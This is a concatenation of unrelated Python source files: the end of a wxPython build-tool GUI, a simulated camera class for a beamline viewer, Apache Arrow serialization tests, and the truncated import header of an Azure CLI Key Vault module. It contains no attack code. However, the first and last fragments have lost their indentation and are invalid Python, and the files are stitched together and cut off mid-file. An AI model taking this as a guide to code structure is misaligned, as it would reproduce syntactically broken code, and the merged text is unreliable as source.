t = Thread(target=self.executeScript, args=(["/tmp/rebuild.sh","Rebuild"]))
t.start()
def OnGenerateBuildScript(self, event):
if self.projectloaded==False:
return
self.greyOutAll()
self.showLog.AppendText("Generate build script...")
openFileDialog = wx.FileDialog(self, "Save buildscript", startpath(), "", "shell (*.sh)|*.sh", wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
openFileDialog.Destroy()
self.greyOutAll(False)
self.showLog.AppendText("aborted...\n")
return False # the user changed idea...
afile=openFileDialog.GetPath()
[fileName, fileExtension]=os.path.splitext(afile)
if fileExtension != '.sh':
afile=afile+'.sh'
set_startpath(os.path.dirname(os.path.realpath(afile)))
dlg = wx.MessageDialog(self, "Script generated will systematically\n clean before build", "Full rebuild ?", wx.YES_NO | wx.ICON_QUESTION)
fullRebuild = dlg.ShowModal() == wx.ID_YES
dlg.Destroy()
openFileDialog.Destroy()
self.generateBuildScript(afile,fullRebuild)
self.greyOutAll(False)
self.showLog.AppendText("Done\n")
self.showLog.AppendText("Script available in " +afile +"\n")
def OnExit(self,e):
if self.building==True:
if self.cancel==1:
time.sleep(1)
wx.PostEvent(self,e)
return
elif self.cancel==0:
self.cancel=1
self.showLog.AppendText("\n\n\nEXITING......\n\n\n")
wx.PostEvent(self,e)
return
self.Close(True)
def checkPackage(pnameList):
ins=[]
for el in pnameList:
ret=subprocess.Popen("dpkg -l | grep " + el, shell=True, stdout=subprocess.PIPE).stdout.read()
if not ret:
ins.append(el)
if len(ins)>0:
print "\n\n\nFollowing package(s) not installed:"
for el in ins:
print "-" +el
print "Please use sudo apt-get install ... to install them\n\n\n"
exit(1)
#check first if package are installed
checkPackage(["python-wxgtk","python-wxtool","libusb-1.0-0","libusb-1.0-0-dev"])
# NOTE(review): readPref() already ran once at import time above; this
# second call re-reads the preferences file -- harmless but redundant.
readPref()
# Start the GUI event loop.
app = wx.App(0)
MainWindow(None, -1, 'Bespoon CoIDE wrapper for ubuntu.')
app.MainLoop()
|
dummyproxy.py | # ----------------------------------------------------------------------
# Author: yury.matveev@desy.de
# ----------------------------------------------------------------------
"""Dummy 2D data generator.
"""
import time
import numpy as np
import logging
from threading import Thread
from petra_camera.devices.base_camera import BaseCamera
from petra_camera.main_window import APP_NAME
logger = logging.getLogger(APP_NAME)
# ----------------------------------------------------------------------
class DummyProxy(BaseCamera):
    """Dummy camera that serves a noisy 2D Gaussian ring, for testing
    without hardware. Two daemon-style worker threads run for the life of
    the object: one regenerates the noisy image, one publishes frames at
    the configured FPS.
    """

    FRAME_W = 500
    FRAME_H = 500
    NOISE = 0.27        # amplitude of the uniform noise added per refresh

    # Generic setting names mapped onto attributes (consumed by BaseCamera).
    _settings_map = {'max_width': ('self', 'FRAME_W'),
                     'max_height': ('self', 'FRAME_H')}

    visible_layouts = ('FPS', 'exposure')

    # ----------------------------------------------------------------------
    def __init__(self, settings):
        super(DummyProxy, self).__init__(settings)

        # Static base image: elliptical Gaussian ring centred at (0, -1).
        x, y = np.meshgrid(np.linspace(-4, 4, self.FRAME_H),
                           np.linspace(-4, 4, self.FRAME_W))
        x += 0.0
        y += -1.0
        mean, sigma = 0, 0.2
        self._baseData = np.exp(-((np.sqrt(x * x + y * y * 4) - mean) ** 2
                                  / (2.0 * sigma ** 2)))
        self._data = self._baseData

        self.error_flag = False
        self.error_msg = ''

        self._fps = self.get_settings('FPS', int)
        if self._fps == 0:
            # unset in the stored settings: fall back to a sane default
            self._fps = 25

        self._generate = False
        self._run = True

        # BUGFIX: mark the workers as alive *before* starting them so that
        # close_camera() cannot observe stale flags during startup.
        self._generator_thread_working = True
        self._new_frame_thead_working = True

        self._generator_thread = Thread(target=self._generator)
        self._new_frame_thead = Thread(target=self._new_frame)
        self._generator_thread.start()
        self._new_frame_thead.start()

    # ----------------------------------------------------------------------
    def close_camera(self):
        """Ask both worker threads to stop and wait until they exit."""
        self._run = False
        while self._generator_thread_working or self._new_frame_thead_working:
            # BUGFIX: poll at roughly the frame period; the original slept
            # self._fps *seconds* per iteration (e.g. 25 s), stalling
            # shutdown for no reason.
            time.sleep(1 / self._fps)

    # ----------------------------------------------------------------------
    def _new_frame(self):
        """Worker: publish a cropped frame every 1/FPS seconds while running."""
        while self._run:
            _last_time = time.time()
            time.sleep(1 / self._fps)
            if self._generate:
                # crop to the region of interest; _picture_size is
                # (y0, x0, y1, x1) -- inherited state, presumably set by
                # BaseCamera; confirm.
                self._last_frame = self._data[self._picture_size[0]:self._picture_size[2],
                                              self._picture_size[1]:self._picture_size[3]]
                self._new_frame_flag = True
                logger.debug(f"{self._my_name} new frame")
                _last_time = time.time()
        self._new_frame_thead_working = False

    # ----------------------------------------------------------------------
    def _generator(self):
        """Worker: refresh the noisy image 10 times per second while running."""
        while self._run:
            _last_time = time.time()
            time.sleep(1 / 10)
            if self._generate:
                nPoints = self.FRAME_W * self.FRAME_H
                self._data = self._baseData + np.random.uniform(0.0, self.NOISE, nPoints).reshape(self.FRAME_W, self.FRAME_H)
                _last_time = time.time()
        self._generator_thread_working = False

    # ----------------------------------------------------------------------
    def start_acquisition(self):
        """Enable frame generation; always succeeds."""
        logger.debug(f"{self._my_name} starting thread")
        self._generate = True
        return True

    # ----------------------------------------------------------------------
    def stop_acquisition(self):
        """Pause frame generation (worker threads keep running idle)."""
        self._generate = False

    # ----------------------------------------------------------------------
    def get_settings(self, option, cast):
        """Answer the dummy-specific limits locally; defer the rest to base."""
        if option in ['FPSmax', 'max_width', 'max_height']:
            logger.debug(f'{self._my_name}: setting {cast.__name__}({option}) requested')
        if option == 'FPSmax':
            return 200
        elif option == 'max_width':
            return self.FRAME_W
        elif option == 'max_height':
            return self.FRAME_H
        else:
            return super(DummyProxy, self).get_settings(option, cast)

    # ----------------------------------------------------------------------
    def save_settings(self, option, value):
        """Track FPS changes locally, then persist through the base class.

        NOTE(review): a value of 0 here is stored as-is and would make the
        frame thread divide by zero; only __init__ guards against 0 --
        confirm whether the caller can ever pass 0.
        """
        if option == 'FPS':
            logger.debug(f'{self._my_name}: setting {option}: new value {value}')
            self._fps = value

        super(DummyProxy, self).save_settings(option, value)
test_serialization.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
from collections import namedtuple, OrderedDict, defaultdict
import datetime
import os
import string
import sys
import pyarrow as pa
import numpy as np
import pyarrow.tests.util as test_util
# torch is optional: tests that need it call pytest.importorskip("torch").
try:
    import torch
except ImportError:
    torch = None
    # Blacklist the module in case `import torch` is costly before
    # failing (ARROW-2071)
    sys.modules['torch'] = None
def assert_equal(obj1, obj2):
    """Recursively assert that *obj1* and *obj2* are equal.

    Dispatch order matters: torch tensors, numpy values, objects with a
    ``__dict__``, dicts, lists, tuples, pyarrow-recognized named tuples,
    then a plain ``==`` fallback.  Raises AssertionError on mismatch.
    """
    if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
        assert torch.equal(obj1, obj2)
        return
    # True when either side comes from the numpy module (arrays or scalars).
    module_numpy = (type(obj1).__module__ == np.__name__ or
                    type(obj2).__module__ == np.__name__)
    if module_numpy:
        empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
                       (hasattr(obj2, "shape") and obj2.shape == ()))
        if empty_shape:
            # This is a special case because currently np.testing.assert_equal
            # fails because we do not properly handle different numerical
            # types.
            assert obj1 == obj2, ("Objects {} and {} are "
                                  "different.".format(obj1, obj2))
        else:
            np.testing.assert_equal(obj1, obj2)
    elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
        # Compare attribute dicts, ignoring the serialization marker key.
        special_keys = ["_pytype_"]
        assert (set(list(obj1.__dict__.keys()) + special_keys) ==
                set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
                                                                  "and {} are "
                                                                  "different."
                                                                  .format(
                                                                      obj1,
                                                                      obj2))
        try:
            # Workaround to make comparison of OrderedDicts work on Python 2.7
            if obj1 == obj2:
                return
        except Exception:
            pass
        if obj1.__dict__ == {}:
            print("WARNING: Empty dict in ", obj1)
        for key in obj1.__dict__.keys():
            if key not in special_keys:
                assert_equal(obj1.__dict__[key], obj2.__dict__[key])
    elif type(obj1) is dict or type(obj2) is dict:
        assert_equal(obj1.keys(), obj2.keys())
        for key in obj1.keys():
            assert_equal(obj1[key], obj2[key])
    elif type(obj1) is list or type(obj2) is list:
        assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
                                        "different lengths."
                                        .format(obj1, obj2))
        for i in range(len(obj1)):
            assert_equal(obj1[i], obj2[i])
    elif type(obj1) is tuple or type(obj2) is tuple:
        assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
                                        "different lengths."
                                        .format(obj1, obj2))
        for i in range(len(obj1)):
            assert_equal(obj1[i], obj2[i])
    elif (pa.lib.is_named_tuple(type(obj1)) or
          pa.lib.is_named_tuple(type(obj2))):
        assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
                                        "with different lengths."
                                        .format(obj1, obj2))
        for i in range(len(obj1)):
            assert_equal(obj1[i], obj2[i])
    else:
        assert obj1 == obj2, ("Objects {} and {} are different."
                              .format(obj1, obj2))
# Scalars, containers, strings and numpy values that must survive a
# serialization round trip unchanged.
PRIMITIVE_OBJECTS = [
    0, 0.0, 0.9, 1 << 62, 1 << 999,
    [1 << 100, [1 << 100]], "a", string.printable, "\u262F",
    "hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
    None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
    [1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
    [1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
    (None, None), ("hello", None), (True, False),
    {True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
    {"hello": set([2, 3]), "world": set([42.0]), "this": None},
    np.int8(3), np.int32(4), np.int64(5),
    np.uint8(3), np.uint32(4), np.uint64(5), np.float16(1.9), np.float32(1.9),
    np.float64(1.9), np.zeros([8, 20]),
    np.random.normal(size=[17, 10]), np.array(["hi", 3]),
    np.array(["hi", 3], dtype=object),
    np.random.normal(size=[15, 13]).T,
]

if sys.version_info >= (3, 0):
    PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
    # Python 2 only: plain longs and a long inside an object array.
    PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0),  # noqa
                          np.array([["hi", u"hi"],
                                    [1.3, long(1)]])]  # noqa
# Deeply nested / repetitive containers exercising the recursive paths.
COMPLEX_OBJECTS = [
    [[[[[[[[[[[[]]]]]]]]]]]],
    {"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
    # {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
    #       (): {(): {}}}}}}}}}}}}},
    ((((((((((),),),),),),),),),),
    {"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
    """Hashable value holder registered as a custom serialization type."""

    def __init__(self, value=0):
        self.value = value

    def __hash__(self):
        return hash(self.value)

    def __eq__(self, other):
        return self.value == other.value
class Bar(object):
    """Object whose attributes field0..fieldN mirror COMPLEX_OBJECTS."""

    def __init__(self):
        for index, obj in enumerate(COMPLEX_OBJECTS):
            setattr(self, "field{}".format(index), obj)
class Baz(object):
    # Composite fixture: holds a Foo and a Bar, and carries a bound method
    # (only the method's presence matters, not its behavior).
    def __init__(self):
        self.foo = Foo()
        self.bar = Bar()

    def method(self, arg):
        # Deliberately empty.
        pass
class Qux(object):
    """Fixture holding a small list of Foo instances."""

    def __init__(self):
        self.objs = [Foo(v) for v in (1, 42)]
class SubQux(Qux):
    """Subclass of Qux registered under its own type id."""

    def __init__(self):
        super(SubQux, self).__init__()
class SubQuxPickle(Qux):
    """Subclass of Qux registered with pickle=True."""

    def __init__(self):
        super(SubQuxPickle, self).__init__()
class CustomError(Exception):
    """Custom exception type registered with the serialization context."""
    pass
# Named-tuple fixtures plus the full list of custom-class test objects.
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
                               "field1, field2, field3, field4, field5")

CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
                  Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
                  NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
                  OrderedDict([("hello", 1), ("world", 2)])]
def make_serialization_context():
    """Return a default context with every test fixture type registered.

    NOTE: Qux is registered under the id "Quz" (sic); the id string only
    needs to be unique, so it is preserved byte-for-byte.
    """
    context = pa.default_serialization_context()
    # (class, type id, register via pickle) -- order preserved from the
    # original explicit call sequence.
    for cls, type_id, use_pickle in (
            (Foo, "Foo", False),
            (Bar, "Bar", False),
            (Baz, "Baz", False),
            (Qux, "Quz", False),
            (SubQux, "SubQux", False),
            (SubQuxPickle, "SubQuxPickle", True),
            (Exception, "Exception", False),
            (CustomError, "CustomError", False),
            (Point, "Point", False),
            (NamedTupleExample, "NamedTupleExample", False)):
        context.register_type(cls, type_id, pickle=use_pickle)
    return context
# Shared context with all fixture types registered; used as the default
# context throughout the roundtrip helpers below.
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
                            context=global_serialization_context):
    """Serialize *value* into *scratch_buffer*, read it back and compare."""
    sink = pa.FixedSizeBufferWriter(scratch_buffer)
    pa.serialize_to(value, sink, context=context)

    source = pa.BufferReader(scratch_buffer)
    restored = pa.deserialize_from(source, None, context=context)
    assert_equal(value, restored)

    # Also exercise the to/from-components path.
    _check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
    """Round-trip *value* through SerializedPyObject components."""
    components = pa.serialize(value, context=context).to_components()
    rebuilt = pa.SerializedPyObject.from_components(components)
    assert_equal(value, rebuilt.deserialize(context=context))
# FIX: pytest.yield_fixture is deprecated (and meant for generator
# fixtures); this fixture returns a value, so plain pytest.fixture applies.
@pytest.fixture(scope='session')
def large_buffer(size=32*1024*1024):
    """Session-scoped 32 MiB Arrow buffer reused as serialization scratch."""
    return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
    """Create a *size*-byte file of random bytes and return its path."""
    tmp_dir = tmpdir_factory.mktemp('data')
    path = tmp_dir.join('pyarrow-serialization-tmp-file').strpath

    payload = (np.random.randint(0, 256, size=size)
               .astype('u1')
               .tobytes()[:size])
    with open(path, 'wb') as f:
        f.write(payload)
    return path
def test_clone():
    """A cloned context must keep the custom (de)serializers."""
    context = pa.SerializationContext()

    class Foo(object):
        pass

    def custom_serializer(obj):
        return 0

    def custom_deserializer(serialized_obj):
        return (serialized_obj, 'a')

    context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
                          custom_deserializer=custom_deserializer)
    cloned = context.clone()

    instance = Foo()
    # Both the original and the clone must produce the custom payload.
    for ctx in (context, cloned):
        restored = pa.serialize(instance, context=ctx).deserialize(context=ctx)
        assert restored == (0, 'a')
def test_primitive_serialization(large_buffer):
    """Every primitive fixture object must survive a round trip."""
    for value in PRIMITIVE_OBJECTS:
        serialization_roundtrip(value, large_buffer)
def test_serialize_to_buffer():
    """to_buffer()/deserialize() round trip, single- and multi-threaded."""
    for nthreads in (1, 4):
        for value in COMPLEX_OBJECTS:
            payload = pa.serialize(value).to_buffer(nthreads=nthreads)
            assert_equal(value, pa.deserialize(payload))
def test_complex_serialization(large_buffer):
    """Nested container fixtures must survive a round trip."""
    for value in COMPLEX_OBJECTS:
        serialization_roundtrip(value, large_buffer)
def test_custom_serialization(large_buffer):
    """Registered custom-class fixtures must survive a round trip."""
    for value in CUSTOM_OBJECTS:
        serialization_roundtrip(value, large_buffer)
def test_default_dict_serialization(large_buffer):
    """defaultdict round trip; needs cloudpickle (skipped otherwise)."""
    pytest.importorskip("cloudpickle")
    value = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
    serialization_roundtrip(value, large_buffer)
def test_numpy_serialization(large_buffer):
    """Round-trip ndarrays of many dtypes, contiguous and sliced."""
    dtypes = ["bool", "int8", "uint8", "int16", "uint16", "int32",
              "uint32", "float16", "float32", "float64", "<U1", "<U2", "<U3",
              "<U4", "|S1", "|S2", "|S3", "|S4", "|O"]
    for dtype in dtypes:
        full = np.random.randint(0, 10, size=(100, 100)).astype(dtype)
        serialization_roundtrip(full, large_buffer)
        # A non-contiguous interior view must round-trip as well.
        view = full[1:99, 10:90]
        serialization_roundtrip(view, large_buffer)
def test_datetime_serialization(large_buffer):
    """Round-trip datetimes with and without time-of-day components."""
    data = [
        # Principia Mathematica published
        datetime.datetime(year=1687, month=7, day=5),
        # Some random date
        datetime.datetime(year=1911, month=6, day=3, hour=4,
                          minute=55, second=44),
        # End of WWI
        datetime.datetime(year=1918, month=11, day=11),
        # Beginning of UNIX time
        datetime.datetime(year=1970, month=1, day=1),
        # The Berlin wall falls
        datetime.datetime(year=1989, month=11, day=9),
        # Another random date
        datetime.datetime(year=2011, month=6, day=3, hour=4,
                          minute=0, second=3),
        # Another random date
        datetime.datetime(year=1970, month=1, day=3, hour=4,
                          minute=0, second=0)
    ]
    for d in data:
        serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
    """Round-trip torch tensors (skipped when torch is not installed)."""
    pytest.importorskip("torch")

    serialization_context = pa.default_serialization_context()
    pa.register_torch_serialization_handlers(serialization_context)
    # These are the only types that are supported for the
    # PyTorch to NumPy conversion
    for t in ["float32", "float64",
              "uint8", "int16", "int32", "int64"]:
        obj = torch.from_numpy(np.random.randn(1000).astype(t))
        serialization_roundtrip(obj, large_buffer,
                                context=serialization_context)
def test_numpy_immutable(large_buffer):
    """Arrays deserialized from a buffer must be read-only views."""
    obj = np.zeros([10])

    writer = pa.FixedSizeBufferWriter(large_buffer)
    pa.serialize_to(obj, writer, global_serialization_context)

    reader = pa.BufferReader(large_buffer)
    result = pa.deserialize_from(reader, None, global_serialization_context)
    # Writing through the deserialized view must fail.
    with pytest.raises(ValueError):
        result[0] = 1.0
def test_numpy_base_object(tmpdir):
    # ARROW-2040: deserialized Numpy array should keep a reference to the
    # owner of its memory
    path = os.path.join(str(tmpdir), 'zzz.bin')
    data = np.arange(12, dtype=np.int32)

    with open(path, 'wb') as f:
        f.write(pa.serialize(data).to_buffer())

    serialized = pa.read_serialized(pa.OSFile(path))
    result = serialized.deserialize()
    assert_equal(result, data)
    # Dropping the SerializedPyObject must not invalidate the array ...
    serialized = None
    assert_equal(result, data)
    # ... because the array keeps its memory owner alive via .base.
    assert result.base is not None
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
    """A custom serializer may return an ndarray payload (ARROW-1695)."""
    class DummyClass(object):
        pass

    def serialize_dummy_class(obj):
        x = np.zeros(4)
        return x

    def deserialize_dummy_class(serialized_obj):
        return serialized_obj

    context = pa.default_serialization_context()
    context.register_type(DummyClass, "DummyClass",
                          custom_serializer=serialize_dummy_class,
                          custom_deserializer=deserialize_dummy_class)

    # Must not raise.
    pa.serialize(DummyClass(), context=context)
def test_numpy_subclass_serialization():
    """Subclasses of np.ndarray serialize via a custom handler pair that
    strips the subclass view on the way out and restores it on the way in."""
    class CustomNDArray(np.ndarray):
        def __new__(cls, input_array):
            array = np.asarray(input_array).view(cls)
            return array

    def serializer(obj):
        # Downcast to a plain ndarray for transport.
        return {'numpy': obj.view(np.ndarray)}

    def deserializer(data):
        array = data['numpy'].view(CustomNDArray)
        return array

    context = pa.default_serialization_context()
    context.register_type(CustomNDArray, 'CustomNDArray',
                          custom_serializer=serializer,
                          custom_deserializer=deserializer)

    x = CustomNDArray(np.zeros(3))
    serialized = pa.serialize(x, context=context).to_buffer()
    new_x = pa.deserialize(serialized, context=context)
    assert type(new_x) == CustomNDArray
    # FIX: np.alltrue was deprecated and removed in NumPy 2.0; np.all is
    # the supported spelling with identical semantics here.
    assert np.all(new_x.view(np.ndarray) == np.zeros(3))
def test_buffer_serialization():
    """A custom serializer may return a pa.Buffer as its payload."""
    class BufferClass(object):
        pass

    def serialize_buffer_class(obj):
        return pa.py_buffer(b"hello")

    def deserialize_buffer_class(serialized_obj):
        return serialized_obj

    context = pa.default_serialization_context()
    context.register_type(
        BufferClass, "BufferClass",
        custom_serializer=serialize_buffer_class,
        custom_deserializer=deserialize_buffer_class)

    b = pa.serialize(BufferClass(), context=context).to_buffer()
    assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits():
    """Objects too large for Arrow must raise a Python exception.

    Requires very large amounts of RAM, hence skipped by default.
    FIX: the original signature declared a stray ``self`` parameter even
    though this is a module-level pytest function; pytest would have
    treated it as a missing fixture had the skip ever been lifted.
    """
    def huge_memory_map(temp_dir):
        return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)

    with pa.memory_map(huge_memory_map, mode="r+") as mmap:
        # Test that objects that are too large for Arrow throw a Python
        # exception. These tests give out of memory errors on Travis and need
        # to be run on a machine with lots of RAM.
        x = 2 ** 29 * [1.0]
        serialization_roundtrip(x, mmap)
        del x
        x = 2 ** 29 * ["s"]
        serialization_roundtrip(x, mmap)
        del x
        x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
        serialization_roundtrip(x, mmap)
        del x
        x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
        serialization_roundtrip(x, mmap)
        del x
        x = np.zeros(2 ** 25)
        serialization_roundtrip(x, mmap)
        del x
        x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
        serialization_roundtrip(x, mmap)
        del x
def test_serialization_callback_error():
    """(De)serializing an unregistered type raises the dedicated callback
    error carrying the offending object / type id."""
    class TempClass(object):
        pass

    # Pass a SerializationContext into serialize, but TempClass
    # is not registered
    serialization_context = pa.SerializationContext()
    val = TempClass()
    with pytest.raises(pa.SerializationCallbackError) as err:
        serialized_object = pa.serialize(val, serialization_context)
    assert err.value.example_object == val

    serialization_context.register_type(TempClass, 20*b"\x00")
    serialized_object = pa.serialize(TempClass(), serialization_context)
    deserialization_context = pa.SerializationContext()

    # Pass a Serialization Context into deserialize, but TempClass
    # is not registered
    with pytest.raises(pa.DeserializationCallbackError) as err:
        serialized_object.deserialize(deserialization_context)
    assert err.value.type_id == 20*b"\x00"
def test_fallback_to_subclasses():
    """An instance serializes via its registered base class's handler."""
    class SubFoo(Foo):
        def __init__(self):
            Foo.__init__(self)

    # should be able to serialize/deserialize an instance
    # if a base class has been registered
    serialization_context = pa.SerializationContext()
    serialization_context.register_type(Foo, "Foo")

    subfoo = SubFoo()
    # should fall back to the Foo serializer
    serialized_object = pa.serialize(subfoo, serialization_context)
    reconstructed_object = serialized_object.deserialize(
        serialization_context
    )
    # Note: the round trip reconstructs a Foo, not a SubFoo.
    assert type(reconstructed_object) == Foo
class Serializable(object):
    """Marker base class whose registration covers all subclasses."""
    pass
def serialize_serializable(obj):
    """Reduce *obj* to its concrete type plus its attribute dict."""
    return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
    """Rebuild an instance from the dict made by serialize_serializable."""
    instance = obj["type"].__new__(obj["type"])
    instance.__dict__.update(obj["data"])
    return instance
class SerializableClass(Serializable):
    # Minimal concrete subclass; the value is checked after the round trip.
    def __init__(self):
        self.value = 3
def test_serialize_subclasses():
    """Serialize a subclass through a single base-class registration."""
    # This test shows how subclasses can be handled in an idiomatic way
    # by having only a serializer for the base class
    # This technique should however be used with care, since pickling
    # type(obj) with cloudpickle will include the full class definition
    # in the serialized representation.
    # This means the class definition is part of every instance of the
    # object, which in general is not desirable; registering all subclasses
    # with register_type will result in faster and more memory
    # efficient serialization.
    context = pa.default_serialization_context()
    context.register_type(
        Serializable, "Serializable",
        custom_serializer=serialize_serializable,
        custom_deserializer=deserialize_serializable)
    a = SerializableClass()
    serialized = pa.serialize(a, context=context)

    deserialized = serialized.deserialize(context=context)
    assert type(deserialized).__name__ == SerializableClass.__name__
    assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
    """Component dicts whose counts do not match the data list must raise."""
    buf = pa.py_buffer(b'hello')

    components = {
        'num_tensors': 0,
        'num_buffers': 1,
        'data': [buf]
    }
    with pytest.raises(pa.ArrowException):
        pa.deserialize_components(components)

    components = {
        'num_tensors': 1,
        'num_buffers': 0,
        'data': [buf, buf]
    }
    with pytest.raises(pa.ArrowException):
        pa.deserialize_components(components)
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
    """Pickle-registered types must deserialize across a process boundary
    (the child uses a default context)."""
    from multiprocessing import Process, Queue
    import re

    regex = re.compile(r"\d+\.\d*")

    serialization_context = pa.SerializationContext()
    serialization_context.register_type(type(regex), "Regex", pickle=True)

    serialized = pa.serialize(regex, serialization_context)
    serialized_bytes = serialized.to_buffer().to_pybytes()

    def deserialize_regex(serialized, q):
        import pyarrow as pa
        q.put(pa.deserialize(serialized))

    q = Queue()
    p = Process(target=deserialize_regex, args=(serialized_bytes, q))
    p.start()
    assert q.get().pattern == regex.pattern
    p.join()
def test_deserialize_buffer_in_different_process():
    """A serialized pa.Buffer must be readable by a fresh interpreter
    (a helper script is run via subprocess on the written file)."""
    import tempfile
    import subprocess

    f = tempfile.NamedTemporaryFile(delete=False)
    b = pa.serialize(pa.py_buffer(b'hello')).to_buffer()
    f.write(b.to_pybytes())
    f.close()

    try:
        subprocess_env = test_util.get_modified_env_with_pythonpath()
        dir_path = os.path.dirname(os.path.realpath(__file__))
        python_file = os.path.join(dir_path, 'deserialize_buffer.py')
        subprocess.check_call([sys.executable, python_file, f.name],
                              env=subprocess_env)
    finally:
        # BUG FIX: the file was created with delete=False and never
        # removed, leaking one temp file per test run.
        os.unlink(f.name)
def test_set_pickle():
    """set_pickle replaces the pickler used for pickle-registered types."""
    # Use a custom type to trigger pickling.
    class Foo(object):
        pass

    context = pa.SerializationContext()
    context.register_type(Foo, 'Foo', pickle=True)

    test_object = Foo()

    # Define a custom serializer and deserializer to use in place of pickle.
    def dumps1(obj):
        return b'custom'

    def loads1(serialized_obj):
        return serialized_obj + b' serialization 1'

    # Test that setting a custom pickler changes the behavior.
    context.set_pickle(dumps1, loads1)
    serialized = pa.serialize(test_object, context=context).to_buffer()
    deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
    assert deserialized == b'custom serialization 1'

    # Define another custom serializer and deserializer.
    def dumps2(obj):
        return b'custom'

    def loads2(serialized_obj):
        return serialized_obj + b' serialization 2'

    # Test that setting another custom pickler changes the behavior again.
    context.set_pickle(dumps2, loads2)
    serialized = pa.serialize(test_object, context=context).to_buffer()
    deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
    assert deserialized == b'custom serialization 2'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="need Python 3.6")
def test_path_objects(tmpdir):
    """serialize_to/deserialize_from accept PEP 519 path-like objects."""
    # Test compatibility with PEP 519 path-like objects
    import pathlib
    p = pathlib.Path(tmpdir) / 'zzz.bin'
    obj = 1234
    pa.serialize_to(obj, p)
    res = pa.deserialize_from(p, None)
    assert res == obj
def test_tensor_alignment():
    """Deserialized numpy arrays must be 64-byte aligned."""
    x = np.random.normal(size=(10, 20, 30))
    y = pa.deserialize(pa.serialize(x).to_buffer())
    assert y.ctypes.data % 64 == 0

    # 1-D arrays of every length 0..99.
    xs = [np.random.normal(size=i) for i in range(100)]
    ys = pa.deserialize(pa.serialize(xs).to_buffer())
    for y in ys:
        assert y.ctypes.data % 64 == 0

    # Ranks 0..19 with unit-length axes.
    xs = [np.random.normal(size=i * (1,)) for i in range(20)]
    ys = pa.deserialize(pa.serialize(xs).to_buffer())
    for y in ys:
        assert y.ctypes.data % 64 == 0

    # Strided (sliced) arrays must be aligned after the round trip too.
    xs = [np.random.normal(size=i * (5,)) for i in range(1, 8)]
    xs = [xs[i][(i + 1) * (slice(1, 3),)] for i in range(len(xs))]
    ys = pa.deserialize(pa.serialize(xs).to_buffer())
    for y in ys:
        assert y.ctypes.data % 64 == 0
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=no-self-use,too-many-arguments,line-too-long
# pylint:disable=too-many-lines
import os
import time
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex
import azure.cli.core.azlogging as azlogging
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.commands import (LongRunningOperation) # pylint:disable=ungrouped-imports
from azure.graphrbac import GraphRbacManagementClient
from azure.keyvault import KeyVaultClient
from OpenSSL import crypto
from azure.mgmt.keyvault.models import (VaultProperties, # pylint:disable=ungrouped-imports
Sku as KeyVaultSku,
AccessPolicyEntry,
Permissions,
CertificatePermissions,
KeyPermissions,
SecretPermissions,
SkuName as KeyVaultSkuName)
from azure.keyvault.models import (CertificateAttributes,
CertificatePolicy,
ActionType,
KeyUsageType,
IssuerParameters,
KeyProperties,
LifetimeAction,
SecretProperties,
X509CertificateProperties,
Trigger,
Action)
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
